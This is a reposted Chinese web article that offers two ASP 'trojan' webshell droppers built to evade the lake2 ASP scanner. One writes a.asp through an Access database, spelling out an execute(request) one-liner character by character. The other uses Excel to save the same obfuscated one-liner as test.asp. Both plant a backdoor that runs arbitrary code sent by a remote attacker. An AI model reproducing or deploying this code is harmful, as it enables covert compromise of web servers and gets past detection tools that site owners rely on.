作家
登录

两个非常规ASP木马(可躲过扫描)

作者: 来源:www.28hudong.com 2013-03-30 08:21:13 阅读 我要评论

hanxiaolian 为了躲避 lake2 ASP站长管理助手而写.. 一.绕过lake2 Asp木马扫描的小马 复制代码 代码如下: <% set c = CreateObject("ADOX.Catalog") c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("a.asp")) set c = Nothing c&Server.MapPath("a.asp") set conn=server.createobject("Adodb.Connection") conn.open connstr conn.execute("create table nomm(nomuma oleobject)") set rs=server.createobject("adodb.recordset") sql="SELECT * FROM nomm" rs.open sql,conn,1,3 rs.addnew rs ("nomuma").appendchunk(chrB(asc("<"))&chrB(asc("%"))&chrB(asc ("e"))&chrB (asc("x"))&chrB(asc("e"))&chrB(asc("c"))&chrB(asc ("u"))&chrB(asc("t"))&chrB(asc ("e"))&chrB(asc("+"))&chrB(asc ("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc ("u"))&chrB(asc ("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("("))&chrB(34) &chrB(asc("q"))&chrB(34)&chrB(asc(")"))&chrB(asc("%"))& chrB(asc(">"))) rs.update rs.close set rs=nothing conn.close set conn=nothing %> 二.xls版asp webshell 复制代码 代码如下: <% Set xlA = Server.CreateObject("Excel.Application") xlA.Visible = False xlA.Workbooks.Add Set xlWorksheet = xlA.Worksheets(1) xlWorksheet.Cells(1,1).Value = "<%ex"&"ec"&"ute(request(""q""))"+chr(37)+">" 'strFile = "d:/test.asp" strFile = Server.MapPath("test.asp") xlWorkSheet.SaveAs strFile xlA.Quit Set xlWorksheet = Nothing Set xlA = Nothing %>

  推荐阅读

  Asp定时执行操作 Asp定时读取数据库(网页定时操作详解)

目前定时的操作有: 一、Html页面的定时刷新(Refresh--刷新 ) 1,Refresh (刷新) 代码使用说明    说明:让网页多长时间(秒)刷新自己,或在多长时间后让网页自动链接到其它网页。    用法:<Meta http-e>>>详细阅读


本文标题:两个非常规ASP木马(可躲过扫描)

地址:http://www.17bianji.com/kaifa2/ASP/32013.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)